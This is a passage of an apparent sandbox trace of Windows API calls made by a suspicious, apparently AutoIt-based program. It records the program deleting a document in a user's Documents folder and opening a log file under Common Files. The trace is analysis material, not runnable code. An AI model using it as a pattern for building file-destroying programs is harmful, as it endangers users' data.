lpsz="_WINAPI_WRITEFILE", cchLength=0x11 | out: lpsz="_WINAPI_WRITEFILE") returned 0x11 [0034.395] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0034.395] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b15a8 [0034.395] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc70 [0034.395] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da138 [0034.395] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889730 [0034.395] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cda8 [0034.395] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da378 [0034.395] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0034.395] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889670 [0034.395] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da318 [0034.395] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da3b8 [0034.395] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8891f0 [0034.395] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76e10000 [0034.395] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889670 [0034.396] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da188 [0034.396] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="WriteFile", cchWideChar=10, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0034.396] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xa) returned 0x8891f0 [0034.396] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="WriteFile", cchWideChar=10, lpMultiByteStr=0x8891f0, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="WriteFile", lpUsedDefaultChar=0x0) returned 10 [0034.396] FreeLibrary (hLibModule=0x76e10000) returned 1 [0034.396] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0034.396] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da378 [0034.396] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20a) returned 0x7b87d0 [0034.396] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da358 [0034.396] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0034.396] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da378 [0034.396] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da358 [0034.396] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0034.396] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da378 [0034.396] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da358 [0034.396] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0034.396] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4f8 [0034.396] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x30) returned 0x7b45c8 [0034.396] CharUpperBuffW (in: lpsz="_WINAPI_CLOSEHANDLE", cchLength=0x13 | out: lpsz="_WINAPI_CLOSEHANDLE") returned 0x13 [0034.396] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0034.396] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1800 [0034.396] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889a78 [0034.396] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af588 [0034.396] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc70 [0034.396] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889730 [0034.396] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af3e8 [0034.396] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0034.396] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8897d8 [0034.396] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af538 [0034.396] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af598 [0034.397] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c9a0 [0034.397] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76e10000 [0034.397] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8897d8 [0034.397] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5c8 [0034.397] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0034.397] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x88c9a0 [0034.397] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x88c9a0, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CloseHandle", lpUsedDefaultChar=0x0) returned 12 [0034.397] FreeLibrary (hLibModule=0x76e10000) returned 1 [0034.397] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0034.397] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af3e8 [0034.397] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20a) returned 0x7b87d0 [0034.397] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af608 [0034.397] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0034.397] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af3e8 [0034.397] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af608 [0034.397] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0034.397] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b18a0 [0034.397] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cce8 [0034.397] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4f8 [0034.397] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c9b8 [0034.397] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\HDwgQZq\\463pkp6oz8WLE1r.doc", nBufferLength=0x7fff, lpBuffer=0x69e9c8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\HDwgQZq\\463pkp6oz8WLE1r.doc", lpFilePart=0x0) returned 0x73 [0034.397] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\HDwgQZq\\463pkp6oz8WLE1r.doc", lpFindFileData=0x6aea10 | out: lpFindFileData=0x6aea10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xef5b7af0, ftCreationTime.dwHighDateTime=0x1d5bcb5, ftLastAccessTime.dwLowDateTime=0x4645edc0, ftLastAccessTime.dwHighDateTime=0x1d5bb0b, ftLastWriteTime.dwLowDateTime=0x1462f680, ftLastWriteTime.dwHighDateTime=0x1d5e3d9, nFileSizeHigh=0x0, nFileSizeLow=0x3c34, dwReserved0=0x6cf858, dwReserved1=0x77391ecd, cFileName="463pkp6oz8WLE1r.doc", cAlternateFileName="463PKP~1.DOC")) returned 0x7c2240 [0034.398] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\HDwgQZq\\463pkp6oz8WLE1r.doc" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\lkoiqe-amaiainsrd\\007meso66\\jhneqt\\pro_og0zrj3k\\hdwgqzq\\463pkp6oz8wle1r.doc")) returned 1 [0034.399] FindNextFileW (in: hFindFile=0x7c2240, lpFindFileData=0x6aea10 | out: lpFindFileData=0x6aea10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xef5b7af0, ftCreationTime.dwHighDateTime=0x1d5bcb5, ftLastAccessTime.dwLowDateTime=0x4645edc0, ftLastAccessTime.dwHighDateTime=0x1d5bb0b, ftLastWriteTime.dwLowDateTime=0x1462f680, ftLastWriteTime.dwHighDateTime=0x1d5e3d9, nFileSizeHigh=0x0, nFileSizeLow=0x3c34, dwReserved0=0x6cf858, dwReserved1=0x77391ecd, cFileName="463pkp6oz8WLE1r.doc", cAlternateFileName="463PKP~1.DOC")) returned 0 [0034.399] FindClose (in: hFindFile=0x7c2240 | out: hFindFile=0x7c2240) returned 1 [0034.399] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c96c8 | out: hHeap=0x770000) returned 1 [0034.399] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5c8 | out: hHeap=0x770000) returned 1 [0034.399] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc70 | out: hHeap=0x770000) returned 1 [0034.399] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af588 | out: hHeap=0x770000) returned 1 [0034.399] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c50e0 | out: hHeap=0x770000) returned 1 [0034.399] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4f8 | out: hHeap=0x770000) returned 1 [0034.399] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c9b8 | out: hHeap=0x770000) returned 1 [0034.399] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cce8 | out: hHeap=0x770000) returned 1 [0034.399] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b18a0 | out: hHeap=0x770000) returned 1 [0034.399] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0034.400] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab260 | out: hHeap=0x770000) returned 1 [0034.400] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce80 | out: hHeap=0x770000) returned 1 [0034.400] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889550 | out: hHeap=0x770000) returned 1 [0034.400] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5f8 | out: hHeap=0x770000) returned 1 [0034.400] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1738 | out: hHeap=0x770000) returned 1 [0034.400] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889910 | out: hHeap=0x770000) returned 1 [0034.400] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cdf0 | out: hHeap=0x770000) returned 1 [0034.400] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4a8 | out: hHeap=0x770000) returned 1 [0034.400] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1c10 | out: hHeap=0x770000) returned 1 [0034.400] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889aa8 | out: hHeap=0x770000) returned 1 [0034.400] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb80 | out: hHeap=0x770000) returned 1 [0034.400] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af7c8 | out: hHeap=0x770000) returned 1 [0034.400] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b19b8 | out: hHeap=0x770000) returned 1 [0034.400] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce08 | out: hHeap=0x770000) returned 1 [0034.400] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af558 | out: hHeap=0x770000) returned 1 [0034.400] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ac320 | out: hHeap=0x770000) returned 1 [0034.400] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af408 | out: hHeap=0x770000) returned 1 [0034.400] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x935008 | out: hHeap=0x770000) returned 1 [0034.400] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae948 | out: hHeap=0x770000) returned 1 [0034.400] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889af0 | out: hHeap=0x770000) returned 1 [0034.400] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8891d8 | out: hHeap=0x770000) returned 1 [0034.400] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af368 | out: hHeap=0x770000) returned 1 [0034.400] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1b20 | out: hHeap=0x770000) returned 1 [0034.400] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c778 | out: hHeap=0x770000) returned 1 [0034.400] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca00 | out: hHeap=0x770000) returned 1 [0034.400] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1bc0 | out: hHeap=0x770000) returned 1 [0034.400] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af568 | out: hHeap=0x770000) returned 1 [0034.400] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1918 | out: hHeap=0x770000) returned 1 [0034.400] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca18 | out: hHeap=0x770000) returned 1 [0034.400] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4b8 | out: hHeap=0x770000) returned 1 [0034.400] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1698 | out: hHeap=0x770000) returned 1 [0034.400] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889a60 | out: hHeap=0x770000) returned 1 [0034.400] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889958 | out: hHeap=0x770000) returned 1 [0034.400] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1648 | out: hHeap=0x770000) returned 1 [0034.400] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0034.400] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1648 [0034.401] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889958 [0034.401] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4b8 [0034.401] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889a60 [0034.401] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af568 [0034.401] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae948 [0034.401] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca18 [0034.401] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af368 [0034.401] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab260 [0034.401] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca18 | out: hHeap=0x770000) returned 1 [0034.401] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae948 | out: hHeap=0x770000) returned 1 [0034.401] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af568 | out: hHeap=0x770000) returned 1 [0034.401] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4b8 | out: hHeap=0x770000) returned 1 [0034.401] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca18 [0034.401] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4b8 [0034.401] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af568 [0034.401] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x30) returned 0x7b45c8 [0034.401] CharUpperBuffW (in: lpsz="_GETFILENAMEEXEXT", cchLength=0x11 | out: lpsz="_GETFILENAMEEXEXT") returned 0x11 [0034.401] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b45c8 | out: hHeap=0x770000) returned 1 [0034.401] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af568 | out: hHeap=0x770000) returned 1 [0034.401] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1698 [0034.401] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7af568 [0034.401] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1918 [0034.401] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca00 [0034.401] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af408 [0034.401] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c778 [0034.401] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af408 | out: hHeap=0x770000) returned 1 [0034.401] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x8891d8 [0034.401] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1bc0 [0034.401] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889af0 [0034.401] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af408 [0034.401] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889af0 | out: hHeap=0x770000) returned 1 [0034.401] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1b20 [0034.401] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889af0 [0034.402] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce08 [0034.402] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab338 [0034.402] PeekMessageW (in: lpMsg=0x6aeb94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb94) returned 0 [0034.402] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b19b8 [0034.402] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb80 [0034.402] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af558 [0034.402] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb80 | out: hHeap=0x770000) returned 1 [0034.402] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1c10 [0034.402] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb80 [0034.402] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889aa8 [0034.402] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af7c8 [0034.402] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889aa8 | out: hHeap=0x770000) returned 1 [0034.402] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1738 [0034.402] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889aa8 [0034.402] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4a8 [0034.402] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cdf0 [0034.402] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4a8 | out: hHeap=0x770000) returned 1 [0034.402] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889910 [0034.402] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4a8 [0034.402] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889550 [0034.402] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4a8 | out: hHeap=0x770000) returned 1 [0034.402] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce80 [0034.402] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4a8 [0034.402] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4a8 | out: hHeap=0x770000) returned 1 [0034.402] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cce8 [0034.402] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4a8 [0034.402] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5f8 [0034.402] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5f8 | out: hHeap=0x770000) returned 1 [0034.402] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4a8 | out: hHeap=0x770000) returned 1 [0034.402] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="c", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0034.402] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="oc", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0034.402] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="doc", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0034.403] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".doc", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0034.403] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cdf0 | out: hHeap=0x770000) returned 1 [0034.403] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889aa8 | out: hHeap=0x770000) returned 1 [0034.403] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889550 | out: hHeap=0x770000) returned 1 [0034.403] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889910 | out: hHeap=0x770000) returned 1 [0034.403] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce80 | out: hHeap=0x770000) returned 1 [0034.403] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cce8 | out: hHeap=0x770000) returned 1 [0034.403] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1738 | out: hHeap=0x770000) returned 1 [0034.403] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af7c8 | out: hHeap=0x770000) returned 1 [0034.403] PeekMessageW (in: lpMsg=0x6aeb94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb94) returned 0 [0034.403] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af7c8 [0034.403] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4a8 [0034.403] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4a8 | out: hHeap=0x770000) returned 1 [0034.403] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af7c8 | out: hHeap=0x770000) returned 1 [0034.403] PeekMessageW (in: lpMsg=0x6aeb94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb94) returned 0 [0034.403] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1738 [0034.403] PeekMessageW (in: lpMsg=0x6aeb94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb94) returned 0 [0034.403] PeekMessageW (in: lpMsg=0x6aeb94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb94) returned 0 [0034.403] CreateFileW (lpFileName="C:\\PROGRA~2\\COMMON~1\\log.txt" (normalized: "c:\\progra~2\\common~1\\log.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x128 [0034.403] SetFilePointerEx (in: hFile=0x128, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0034.403] SetFilePointerEx (in: hFile=0x128, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6aee24 | out: lpNewFilePointer=0x0) returned 1 [0034.403] SetFilePointerEx (in: hFile=0x128, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0034.403] SetFilePointerEx (in: hFile=0x128, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6aee04 | out: lpNewFilePointer=0x0) returned 1 [0034.403] SetFilePointerEx (in: hFile=0x128, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6aee14 | out: lpNewFilePointer=0x0) returned 1 [0034.404] ReadFile (in: hFile=0x128, lpBuffer=0x935008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x6aee3c, lpOverlapped=0x0 | out: lpBuffer=0x935008*, lpNumberOfBytesRead=0x6aee3c*=0x14a0, lpOverlapped=0x0) returned 1 [0034.404] ReadFile (in: hFile=0x128, lpBuffer=0x935008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x6aee3c, lpOverlapped=0x0 | out: lpBuffer=0x935008*, lpNumberOfBytesRead=0x6aee3c*=0x0, lpOverlapped=0x0) returned 1 [0034.404] SetFilePointerEx (in: hFile=0x128, liDistanceToMove=0x14a0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0034.404] SetFilePointerEx (in: hFile=0x128, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6aee04 | out: lpNewFilePointer=0x0) returned 1 [0034.404] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af7c8 | out: hHeap=0x770000) returned 1 [0034.404] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x945010 | out: hHeap=0x770000) returned 1 [0034.405] PeekMessageW (in: 